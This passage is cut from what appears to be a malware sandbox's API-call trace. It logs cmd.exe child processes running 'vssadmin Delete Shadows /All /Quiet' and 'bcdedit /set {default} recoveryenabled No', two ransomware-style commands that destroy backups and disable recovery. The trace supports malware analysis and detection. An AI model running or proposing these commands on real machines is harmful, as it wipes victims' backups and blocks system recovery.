lpFindFileData=0x34f31c) returned 0xffffffff [0076.738] GetLastError () returned 0x2 [0076.738] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.738] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x34f31c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34f31c) returned 0x6a34f0 [0076.738] GetProcessHeap () returned 0x690000 [0076.738] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x14) returned 0x6a3530 [0076.738] FindClose (in: hFindFile=0x6a34f0 | out: hFindFile=0x6a34f0) returned 1 [0076.738] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x34f31c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34f31c) returned 0xffffffff [0076.739] GetLastError () returned 0x2 [0076.739] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x34f31c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34f31c) returned 0x6a34f0 [0076.739] GetProcessHeap () returned 0x690000 [0076.739] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6a3530, Size=0x4) returned 0x6a3530 [0076.739] FindClose (in: hFindFile=0x6a34f0 | out: hFindFile=0x6a34f0) returned 1 [0076.739] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0076.739] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0076.739] GetConsoleTitleW (in: lpConsoleTitle=0x34f814, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0077.101] InitializeProcThreadAttributeList (in: lpAttributeList=0x34f69c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x34f764 | out: lpAttributeList=0x34f69c, lpSize=0x34f764) returned 1 [0077.101] UpdateProcThreadAttribute (in: lpAttributeList=0x34f69c, dwFlags=0x0, Attribute=0x60001, lpValue=0x34f75c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x34f69c, lpPreviousValue=0x0) returned 1 [0077.101] GetStartupInfoW (in: lpStartupInfo=0x34f658 | out: lpStartupInfo=0x34f658*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0077.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x18) returned 0x6a34f0 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.101] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0077.102] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0077.102] GetProcessHeap () returned 0x690000 [0077.102] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a34f0 | out: hHeap=0x690000) returned 1 [0077.102] GetProcessHeap () returned 0x690000 [0077.102] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa) returned 0x69ff30 [0077.102] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0077.103] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x34f6f8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin Delete Shadows /All /Quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x34f744 | out: lpCommandLine="vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x34f744*(hProcess=0x78, hThread=0x74, dwProcessId=0x7b8, dwThreadId=0xc0)) returned 1 [0078.075] CloseHandle (hObject=0x74) returned 1 [0078.075] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0078.075] GetProcessHeap () returned 0x690000 [0078.075] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a5f20 | out: hHeap=0x690000) returned 1 [0078.075] GetEnvironmentStringsW () returned 0x6a5f20* [0078.075] GetProcessHeap () returned 0x690000 [0078.075] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb36) returned 0x6a40e0 [0078.075] FreeEnvironmentStringsW (penv=0x6a5f20) returned 1 [0078.075] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0093.124] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x34f638 | out: lpExitCode=0x34f638*=0x2) returned 1 [0093.125] CloseHandle (hObject=0x78) returned 1 [0093.125] _vsnwprintf (in: _Buffer=0x34f780, _BufferCount=0x13, _Format="%08X", _ArgList=0x34f644 | out: _Buffer="00000002") returned 8 [0093.125] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0093.125] GetProcessHeap () returned 0x690000 [0093.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a40e0 | out: hHeap=0x690000) returned 1 [0093.126] GetEnvironmentStringsW () returned 0x6a40e0* [0093.126] GetProcessHeap () returned 0x690000 [0093.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb5c) returned 0x6a95c8 [0093.126] FreeEnvironmentStringsW (penv=0x6a40e0) returned 1 [0093.126] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0093.126] GetProcessHeap () returned 0x690000 [0093.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a95c8 | out: hHeap=0x690000) returned 1 [0093.126] GetEnvironmentStringsW () returned 0x6a40e0* [0093.126] GetProcessHeap () returned 0x690000 [0093.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb5c) returned 0x6a95c8 [0093.126] FreeEnvironmentStringsW (penv=0x6a40e0) returned 1 [0093.126] GetProcessHeap () returned 0x690000 [0093.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69ff30 | out: hHeap=0x690000) returned 1 [0093.126] DeleteProcThreadAttributeList (in: lpAttributeList=0x34f69c | out: lpAttributeList=0x34f69c) [0093.126] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.126] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0093.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.127] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0093.127] _get_osfhandle (_FileHandle=0) returned 0x3 [0093.127] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0093.128] SetConsoleInputExeNameW () returned 0x1 [0093.128] GetConsoleOutputCP () returned 0x1b5 [0093.128] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0093.128] SetThreadUILanguage (LangId=0x0) returned 0x409 [0093.128] exit (_Code=2) Process: id = "12" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4630b000" os_pid = "0xb78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c bcdedit /set {default} recoveryenabled No" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 41 os_tid = 0xba4 [0076.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fb6c | out: lpSystemTimeAsFileTime=0x14fb6c*(dwLowDateTime=0xf29b8040, dwHighDateTime=0x1d61645)) [0076.892] GetCurrentProcessId () returned 0xb78 [0076.892] GetCurrentThreadId () returned 0xba4 [0076.892] GetTickCount () returned 0x1149770 [0076.892] QueryPerformanceCounter (in: lpPerformanceCount=0x14fb64 | out: lpPerformanceCount=0x14fb64*=19724706241) returned 1 [0076.893] GetModuleHandleA (lpModuleName=0x0) returned 0x4a800000 [0076.893] __set_app_type (_Type=0x1) [0076.894] __p__fmode () returned 0x770331f4 [0076.894] __p__commode () returned 0x770331fc [0076.894] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8221a6) returned 0x0 [0076.894] __getmainargs (in: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c, _DoWildCard=0, _StartInfo=0x4a824140 | out: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c) returned 0 [0076.894] GetCurrentThreadId () returned 0xba4 [0076.894] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xba4) returned 0x60 [0076.894] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.894] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0076.894] SetThreadUILanguage (LangId=0x0) returned 0x409 [0076.895] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0076.895] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fafc | out: phkResult=0x14fafc*=0x0) returned 0x2 [0076.895] VirtualQuery (in: lpAddress=0x14fb33, lpBuffer=0x14facc, dwLength=0x1c | out: lpBuffer=0x14facc*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.895] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14facc, dwLength=0x1c | out: lpBuffer=0x14facc*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0076.895] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14facc, dwLength=0x1c | out: lpBuffer=0x14facc*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0076.895] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14facc, dwLength=0x1c | out: lpBuffer=0x14facc*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.895] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14facc, dwLength=0x1c | out: lpBuffer=0x14facc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0076.895] GetConsoleOutputCP () returned 0x1b5 [0076.895] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.895] SetConsoleCtrlHandler (HandlerRoutine=0x4a81e72a, Add=1) returned 1 [0076.896] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.896] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0076.896] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.896] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0076.896] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.896] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0076.896] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.896] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0076.897] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.897] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0076.897] GetEnvironmentStringsW () returned 0x382070* [0076.897] GetProcessHeap () returned 0x370000 [0076.897] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xaca) returned 0x382b48 [0076.897] FreeEnvironmentStringsW (penv=0x382070) returned 1 [0076.897] GetProcessHeap () returned 0x370000 [0076.897] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x4) returned 0x380ca8 [0076.897] GetEnvironmentStringsW () returned 0x382070* [0076.897] GetProcessHeap () returned 0x370000 [0076.897] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xaca) returned 0x383620 [0076.898] FreeEnvironmentStringsW (penv=0x382070) returned 1 [0076.898] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ea6c | out: phkResult=0x14ea6c*=0x68) returned 0x0 [0076.898] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x0, lpData=0x14ea78*=0x0, lpcbData=0x14ea70*=0x1000) returned 0x2 [0076.898] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x1, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.898] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x0, lpData=0x14ea78*=0x1, lpcbData=0x14ea70*=0x1000) returned 0x2 [0076.898] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x0, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x40, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x40, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x0, lpData=0x14ea78*=0x40, lpcbData=0x14ea70*=0x1000) returned 0x2 [0076.899] RegCloseKey (hKey=0x68) returned 0x0 [0076.899] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ea6c | out: phkResult=0x14ea6c*=0x68) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x0, lpData=0x14ea78*=0x40, lpcbData=0x14ea70*=0x1000) returned 0x2 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x1, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x0, lpData=0x14ea78*=0x1, lpcbData=0x14ea70*=0x1000) returned 0x2 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x0, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x9, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x9, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x0, lpData=0x14ea78*=0x9, lpcbData=0x14ea70*=0x1000) returned 0x2 [0076.899] RegCloseKey (hKey=0x68) returned 0x0 [0076.899] time (in: timer=0x0 | out: timer=0x0) returned 0x5e9c43c9 [0076.899] srand (_Seed=0x5e9c43c9) [0076.899] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c bcdedit /set {default} recoveryenabled No" [0076.899] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c bcdedit /set {default} recoveryenabled No" [0076.900] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.900] GetProcessHeap () returned 0x370000 [0076.900] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x210) returned 0x382070 [0076.900] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x382078, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0076.900] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0076.900] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0076.900] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.900] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0076.900] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0076.900] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0076.900] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0076.900] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0076.900] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0076.900] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0076.900] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0076.900] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0076.900] GetProcessHeap () returned 0x370000 [0076.900] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x382b48 | out: hHeap=0x370000) returned 1 [0076.900] GetEnvironmentStringsW () returned 0x382288* [0076.900] GetProcessHeap () returned 0x370000 [0076.900] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xae2) returned 0x384be8 [0076.901] FreeEnvironmentStringsW (penv=0x382288) returned 1 [0076.901] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0076.901] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.901] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0076.901] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0076.901] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0076.901] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0076.901] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0076.901] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0076.901] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0076.901] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0076.901] GetProcessHeap () returned 0x370000 [0076.901] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x54) returned 0x3856d8 [0076.901] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f838 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x14f838, lpFilePart=0x14f834 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f834*="Desktop") returned 0x25 [0076.901] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.901] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f5b4 | out: lpFindFileData=0x14f5b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x381ef0 [0076.901] FindClose (in: hFindFile=0x381ef0 | out: hFindFile=0x381ef0) returned 1 [0076.902] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x14f5b4 | out: lpFindFileData=0x14f5b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x381ef0 [0076.902] FindClose (in: hFindFile=0x381ef0 | out: hFindFile=0x381ef0) returned 1 [0076.902] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0076.902] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x14f5b4 | out: lpFindFileData=0x14f5b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe392fd80, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xe392fd80, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x381ef0 [0076.902] FindClose (in: hFindFile=0x381ef0 | out: hFindFile=0x381ef0) returned 1 [0076.902] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: 